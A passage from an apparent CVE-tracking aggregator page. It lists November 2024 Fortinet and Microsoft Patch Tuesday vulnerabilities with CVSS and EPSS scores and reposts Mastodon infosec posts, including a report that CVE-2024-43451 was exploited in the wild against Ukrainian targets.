  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-26011
(5.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:31:01

1 posts

A missing authentication for critical function in Fortinet FortiManager version 7.4.0 through 7.4.2, 7.2.0 through 7.2.4, 7.0.0 through 7.0.11, 6.4.0 through 6.4.14, FortiPAM version 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiProxy version 7.4.0 through 7.4.2, 7.2.0 through 7.2.9, 7.0.0 through 7.0.17, 2.0.0 through 2.0.14, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7,

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-40592
(7.6 HIGH)

EPSS: 0.04%

updated 2024-11-12T21:31:01

1 posts

An improper verification of cryptographic signature vulnerability [CWE-347] in FortiClient MacOS version 7.4.0, version 7.2.4 and below, version 7.0.10 and below, version 6.4.10 and below may allow a local authenticated attacker to swap the installer with a malicious package via a race condition during the installation process.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-23666
(7.5 HIGH)

EPSS: 0.04%

updated 2024-11-12T21:30:54

1 posts

A client-side enforcement of server-side security in Fortinet FortiAnalyzer-BigData at least version 7.4.0 and 7.2.0 through 7.2.6 and 7.0.1 through 7.0.6 and 6.4.5 through 6.4.7 and 6.2.5, FortiManager version 7.4.0 through 7.4.1 and 7.2.0 through 7.2.4 and 7.0.0 through 7.0.11 and 6.4.0 through 6.4.14, FortiAnalyzer version 7.4.0 through 7.4.1 and 7.2.0 through 7.2.4 and 7.0.0 through 7.0.11 an

screaminggoat@infosec.exchange at 2024-11-13T14:12:42.000Z ##

Additional Fortinet security advisories:

  1. FG-IR-23-396 CVE-2024-23666 (7.5 high) Readonly users could run some sensitive operations (FortiAnalyzer)
  2. FG-IR-24-033 CVE-2024-33510 (4.3 medium) SSLVPN WEB UI Text injection (FortiOS/FortiProxy)
  3. FG-IR-24-098 CVE-2024-31496 (6.7 medium) Stack buffer overflow in CLI command (FortiAnalyzer/FortiManager)
  4. FG-IR-22-155 CVE-2024-40590 (4.8 medium) missing digital certificate validation (FortiPortal)

No mention of exploitation.

#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-36507
(7.3 HIGH)

EPSS: 0.05%

updated 2024-11-12T21:30:53

1 posts

A untrusted search path in Fortinet FortiClientWindows versions 7.4.0, versions 7.2.4 through 7.2.0, versions 7.0.12 through 7.0.0 allows an attacker to run arbitrary code via DLL hijacking and social engineering.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-31496
(6.7 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:30:52

1 posts

A stack-based buffer overflow vulnerability [CWE-121] in Fortinet FortiManager version 7.4.0 through 7.4.2 and before 7.2.5, FortiAnalyzer version 7.4.0 through 7.4.2 and before 7.2.5 and FortiAnalyzer-BigData 7.4.0 and before 7.2.7 allows a privileged attacker to execute unauthorized code or commands via crafted CLI requests.

screaminggoat@infosec.exchange at 2024-11-13T14:12:42.000Z ##

Additional Fortinet security advisories:

  1. FG-IR-23-396 CVE-2024-23666 (7.5 high) Readonly users could run some sensitive operations (FortiAnalyzer)
  2. FG-IR-24-033 CVE-2024-33510 (4.3 medium) SSLVPN WEB UI Text injection (FortiOS/FortiProxy)
  3. FG-IR-24-098 CVE-2024-31496 (6.7 medium) Stack buffer overflow in CLI command (FortiAnalyzer/FortiManager)
  4. FG-IR-22-155 CVE-2024-40590 (4.8 medium) missing digital certificate validation (FortiPortal)

No mention of exploitation.

#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-33510
(4.3 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:30:52

1 posts

An improper neutralization of special elements in output used by a downstream component ('Injection') vulnerability [CWE-74] in FortiOS version 7.4.3 and below, version 7.2.8 and below, version 7.0.16 and below; FortiProxy version 7.4.3 and below, version 7.2.9 and below, version 7.0.16 and below; FortiSASE version 24.2.b SSL-VPN web user interface may allow a remote unauthenticated attacker to pe

screaminggoat@infosec.exchange at 2024-11-13T14:12:42.000Z ##

Additional Fortinet security advisories:

  1. FG-IR-23-396 CVE-2024-23666 (7.5 high) Readonly users could run some sensitive operations (FortiAnalyzer)
  2. FG-IR-24-033 CVE-2024-33510 (4.3 medium) SSLVPN WEB UI Text injection (FortiOS/FortiProxy)
  3. FG-IR-24-098 CVE-2024-31496 (6.7 medium) Stack buffer overflow in CLI command (FortiAnalyzer/FortiManager)
  4. FG-IR-22-155 CVE-2024-40590 (4.8 medium) missing digital certificate validation (FortiPortal)

No mention of exploitation.

#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-32118
(6.7 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:30:52

1 posts

Multiple improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerabilities [CWE-78] in Fortinet FortiManager version 7.4.0 through 7.4.2 and before 7.2.5, Fortinet FortiAnalyzer version 7.4.0 through 7.4.2 and before 7.2.5 and Fortinet FortiAnalyzer-BigData before 7.4.0 allows an authenticated privileged attacker to execute unauthorized code or commands via

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-32116
(5.1 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:30:52

1 posts

Multiple relative path traversal vulnerabilities [CWE-23] in Fortinet FortiManager version 7.4.0 through 7.4.2 and before 7.2.5, FortiAnalyzer version 7.4.0 through 7.4.2 and before 7.2.5 and FortiAnalyzer-BigData version 7.4.0 and before 7.2.7 allows a privileged attacker to delete files from the underlying filesystem via crafted CLI requests.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2023-44255
(4.1 MEDIUM)

EPSS: 0.04%

updated 2024-11-12T21:30:52

1 posts

An exposure of sensitive information to an unauthorized actor [CWE-200] in Fortinet FortiManager before 7.4.2, FortiAnalyzer before 7.4.2 and FortiAnalyzer-BigData before 7.2.5 may allow a privileged attacker with administrative read permissions to read event logs of another adom via crafted HTTP or HTTPs requests.

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-35274
(2.3 LOW)

EPSS: 0.04%

updated 2024-11-12T21:30:52

1 posts

An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability [CWE-22] in Fortinet FortiAnalyzer versions below 7.4.2, Fortinet FortiManager versions below 7.4.2 and Fortinet FortiAnalyzer-BigData version 7.4.0 and below 7.2.7 allows a privileged attacker with read write administrative privileges to create non-arbitrary files on a chosen directory via crafted CLI

screaminggoat@infosec.exchange at 2024-11-12T19:25:40.000Z ##

Happy #PatchTuesday from Fortinet:

  1. FG-IR-24-115 CVE-2024-32117 (4.9 medium) Arbitrary file read in administrative interface (FortiAnalyzer)
  2. FG-IR-24-180 CVE-2024-36509 (4.2 medium) Exposure of password hashes to read-only admin (FortiWeb)
  3. FG-IR-24-022 CVE-2024-40592 (7.5 high) FortiClientMacOS - Missing signature verification
  4. FG-IR-24-032 CVE-2024-26011 (5.3 medium) FortiOS - Improper authentication in fgfmd
  5. FG-IR-23-475 CVE-2023-50176 (7.1 high) FortiOS - SSLVPN session hijacking using SAML authentication
  6. FG-IR-24-125 CVE-2024-33505 (5.6 medium) Heap buffer overflow in httpd (FortiAnalyzer)
  7. FG-IR-23-448 CVE-2023-47543 (5.4 medium) Insecure Direct Object Reference over API endpoints (FortiPortal)
  8. FG-IR-23-267 CVE-2023-44255 (4.1 medium) Lack of capacity to filter logs by administrator access (FortiAnalyzer)
  9. FG-IR-24-199 CVE-2024-47574 (7.8 high) Named Pipes Improper Access Control (FortiClientWindows)
  10. FG-IR-24-116 CVE-2024-32118 (6.7 medium) OS command injection in CLI command (FortiClientWindows)
  11. FG-IR-24-205 CVE-2024-36507 (7.3 high) Online Installer DLL Hijacking
  12. FG-IR-24-099 CVE-2024-32116 (5.1 medium) Path traversal vulnerability in CLI commands (FortiAnalyzer)
  13. FG-IR-24-179 CVE-2024-35274 (2.3 low) Path traversal vulnerability leading to file creation (FortiAnalyzer)
  14. FG-IR-24-144 CVE-2024-36513 (8.2 high) Privilege escalation via lua auto patch function (FortiClientWindows)

Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.

#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity

##

CVE-2024-43602
(10.0 CRITICAL)

EPSS: 0.05%

updated 2024-11-12T18:31:06

1 posts

Azure CycleCloud Remote Code Execution Vulnerability

mttaggart@infosec.exchange at 2024-11-12T18:54:56.000Z ##

Some fairly interesting stuff for this #PatchTuesday!

Of particular note for me, a 9.9 in Azure CycleCloud (CVE-2024-43602), a Windows AppContainer escape (CVE-2024-49039), and a RCE in .NET/Visual Studio (CVE-2024-43498)? That one needs more detail.

zerodayinitiative.com/blog/202

##

CVE-2024-43451
(6.5 MEDIUM)

EPSS: 0.47%

updated 2024-11-12T18:31:05

19 posts

NTLM Hash Disclosure Spoofing Vulnerability

threatcodex at 2024-11-14T16:27:22.097Z ##

CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild

clearskysec.com/0d-vulnerabili

##

threatcodex at 2024-11-14T15:49:26.833Z ##

CVE-2024-43451 and other reasons to update ASAP

kaspersky.com/blog/2024-novemb

##

screaminggoat at 2024-11-13T18:13:40.862Z ##

ClearSky: CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild
Reference: CVE-2024-43451 (6.5 medium, disclosed 12 November 2024 by Microsoft as an exploited zero-day, added to CISA KEV Catalog same day) NTLM Hash Disclosure Spoofing Vulnerability

ClearSky reports that CVE-2024-43451 was exploited in the wild against Ukrainian entities when it was discovered in June 2024. A compromised Ukrainian government server sent phishing emails which contained a malicious URL file. Any interaction triggers the vulnerability which establishes a connection with the attacker's server and downloads further malicious files like SparkRAT. The campaign is attributed to the suspected Russian threat actor group UAC-0194. See the 14 page PDF report. Indicators of compromise are listed inside.

##

threatcodex@infosec.exchange at 2024-11-14T16:27:22.000Z ##

CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild
#CVE_2024_43451 #UAC_0194
clearskysec.com/0d-vulnerabili

##

screaminggoat@infosec.exchange at 2024-11-13T18:13:40.000Z ##

ClearSky: CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild
Reference: CVE-2024-43451 (6.5 medium, disclosed 12 November 2024 by Microsoft as an exploited zero-day, added to CISA KEV Catalog same day) NTLM Hash Disclosure Spoofing Vulnerability

ClearSky reports that CVE-2024-43451 was exploited in the wild against Ukrainian entities when it was discovered in June 2024. A compromised Ukrainian government server sent phishing emails which contained a malicious URL file. Any interaction triggers the vulnerability which establishes a connection with the attacker's server and downloads further malicious files like SparkRAT. The campaign is attributed to the suspected Russian threat actor group UAC-0194. See the 14 page PDF report. Indicators of compromise are listed inside.

#CVE_2024_43451 #vulnerability #eitw #activeexploitation #kev #uac0194 #russia #russiaukrainewar #ukraine #cyberespionage #cyberthreatintelligence #threatintel #cybersecurity #infosec #CTI #IOC #sparkRAT

##

jos1264@social.skynetcloud.site at 2024-11-12T22:20:02.000Z ##

Microsoft Patch Tuesday, November 2024 Edition krebsonsecurity.com/2024/11/mi #MicrosoftPatchTuesdayNovember2024 #SecurityTools #CVE202443451 #CVE202443602 #CVE202449019 #CVE202449039 #CVE202449040 #SatnamNarang #TimetoPatch #GoogleTAG #Tenable

##

jos1264@social.skynetcloud.site at 2024-11-12T20:15:03.000Z ##

Microsoft Confirms Zero-Day Exploitation of Task Scheduler Flaw securityweek.com/microsoft-con #Malware&Threats #Vulnerabilities #CVE202443451 #CVE202449039 #PatchTuesday #Microsoft #Featured #ZeroDay

##

jos1264@social.skynetcloud.site at 2024-11-12T20:15:03.000Z ##

Microsoft Confirms Zero-Day Exploitation of Task Scheduler Flaw securityweek.com/microsoft-con #Malware&Threats #Vulnerabilities #CVE202443451 #CVE202449039 #PatchTuesday #Microsoft #Featured #ZeroDay

##

jos1264@social.skynetcloud.site at 2024-11-12T22:20:02.000Z ##

Microsoft Patch Tuesday, November 2024 Edition krebsonsecurity.com/2024/11/mi #MicrosoftPatchTuesdayNovember2024 #SecurityTools #CVE202443451 #CVE202443602 #CVE202449019 #CVE202449039 #CVE202449040 #SatnamNarang #TimetoPatch #GoogleTAG #Tenable

##

jos1264@social.skynetcloud.site at 2024-11-12T20:15:03.000Z ##

Microsoft Confirms Zero-Day Exploitation of Task Scheduler Flaw securityweek.com/microsoft-con #Malware&Threats #Vulnerabilities #CVE202443451 #CVE202449039 #PatchTuesday #Microsoft #Featured #ZeroDay

##

jos1264@social.skynetcloud.site at 2024-11-12T20:15:03.000Z ##

Microsoft Confirms Zero-Day Exploitation of Task Scheduler Flaw securityweek.com/microsoft-con #Malware&Threats #Vulnerabilities #CVE202443451 #CVE202449039 #PatchTuesday #Microsoft #Featured #ZeroDay

##

verbrecher@mastodon.social at 2024-11-14T22:26:32.000Z ##

Microsoft has urgently patched two high-risk vulnerabilities actively targeted by attackers:

🔹 CVE-2024-43451 – Attackers can hijack user privileges by exposing NTLMv2 hash credentials, letting them authenticate as the user with a “pass the hash” attack.

🔹 CVE-2024-49039 – A Windows Task Scheduler flaw enabling attackers to escape AppContainer restrictions and gain elevated access.

⚠️ Immediate Action: Update your systems now to block these dangerous exploits!

##

rogeragrimes@infosec.exchange at 2024-11-14T20:24:17.000Z ##

3rd Microsoft vuln this year (among the over a dozen over the years I'm tracking) of how a remote attacker can get a user's Windows password NT hashes without needing to be admin on the user's device. Your passwords need to be truly random...now!

msrc.microsoft.com/update-guid

##

jbhall56@infosec.exchange at 2024-11-14T14:11:13.000Z ##

The vulnerability in question, CVE-2024-43451 (CVSS score: 6.5), refers to an NTLM hash disclosure spoofing vulnerability that could be exploited to steal a user's NTLMv2 hash. It was patched by Microsoft earlier this week. thehackernews.com/2024/11/russ

##

jos1264@social.skynetcloud.site at 2024-11-14T11:00:07.000Z ##

How a Windows zero-day was exploited in the wild for months (CVE-2024-43451) helpnetsecurity.com/2024/11/14 #ClearSkyCyberSecurity #spearphishing #vulnerability #WindowsServer #Don'tmiss #Hotstuff #malware #Ukraine #Windows #News #CVE

##

jos1264@social.skynetcloud.site at 2024-11-12T21:20:03.000Z ##

Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) helpnetsecurity.com/2024/11/12 #MicrosoftDefender #ActiveDirectory #securityupdate #ImmersiveLabs #vulnerability #WindowsServer #PatchTuesday #TrendMicro #Don'tmiss #Microsoft #Hotstuff #OpenSSL #Tenable #Windows #Ivanti #0-day #News #CVE

##

cisakevtracker@mastodon.social at 2024-11-12T19:01:40.000Z ##

CVE ID: CVE-2024-43451
Vendor: Microsoft
Product: Windows
Date Added: 2024-11-12
Vulnerability: Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat@infosec.exchange at 2024-11-12T18:39:59.000Z ##

CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!

  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability
  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability
  • CVE-2021-41277 (perfect 10.0 🥳) Metabase GeoJSON API Local File Inclusion Vulnerability
  • CVE-2014-2120 (CVSSv2: 4.3 medium) Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability
  • CVE-2021-26086 (5.3 medium) Atlassian Jira Server and Data Center Path Traversal Vulnerability

#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity

##

screaminggoat@infosec.exchange at 2024-11-12T17:59:09.000Z ##

Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities

  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability (EXPLOITED, PUBLICLY DISCLOSED)
  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability (EXPLOITED)
  • CVE-2024-49019 (7.8 high) Active Directory Certificate Services Elevation of Privilege Vulnerability (PUBLICLY DISCLOSED)
  • CVE-2024-49040 (7.5 high) Microsoft Exchange Server Spoofing Vulnerability (PUBLICLY DISCLOSED)

#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2024-49040
(7.5 HIGH)

EPSS: 0.09%

updated 2024-11-12T18:31:00

4 posts

Microsoft Exchange Server Spoofing Vulnerability

screaminggoat at 2024-11-14T19:34:24.405Z ##

Microsoft Security Response Center (MSRC): CVE-2024-49040 (update)
MSRC temporarily paused the rollout of the update for CVE-2024-49040 (7.5 high, disclosed 12 November 2024) Microsoft Exchange Server Spoofing Vulnerability. According to the Exchange Team blog:

Known issues with this update
We are aware of customers having an issue with the Transport rules stopping periodically after this update is installed. Based on our initial investigation, this can happen to customers who use their own transport or DLP rules. If you are seeing this problem, you might have to uninstall the November SU until it is re-released.
We are continuing the investigation and are working on a permanent fix to address this issue. We will release it when ready. We have also paused the rollout of November 2024 SU to Windows / Microsoft Update. Customers who might not use Transport or DLP rules and did not run into the issue with rules, can continue using the November SU update.

##

screaminggoat@infosec.exchange at 2024-11-14T19:34:24.000Z ##

Microsoft Security Response Center (MSRC): CVE-2024-49040 (update)
MSRC temporarily paused the rollout of the update for CVE-2024-49040 (7.5 high, disclosed 12 November 2024) Microsoft Exchange Server Spoofing Vulnerability. According to the Exchange Team blog:

Known issues with this update
We are aware of customers having an issue with the Transport rules stopping periodically after this update is installed. Based on our initial investigation, this can happen to customers who use their own transport or DLP rules. If you are seeing this problem, you might have to uninstall the November SU until it is re-released.
We are continuing the investigation and are working on a permanent fix to address this issue. We will release it when ready. We have also paused the rollout of November 2024 SU to Windows / Microsoft Update. Customers who might not use Transport or DLP rules and did not run into the issue with rules, can continue using the November SU update.

#microsoft #CVE_2024_49040 #exchange #vulnerability #CVE #infosec #cybersecurity

##

ricardo@bsd.cafe at 2024-11-12T21:56:38.000Z ##

Takeaway from Solidlab security researcher Vsevolod Kokorin on CVE-2024-49040
bleepingcomputer.com/news/secu

#mail #microsoft #exchange #smtp

##

screaminggoat@infosec.exchange at 2024-11-12T17:59:09.000Z ##

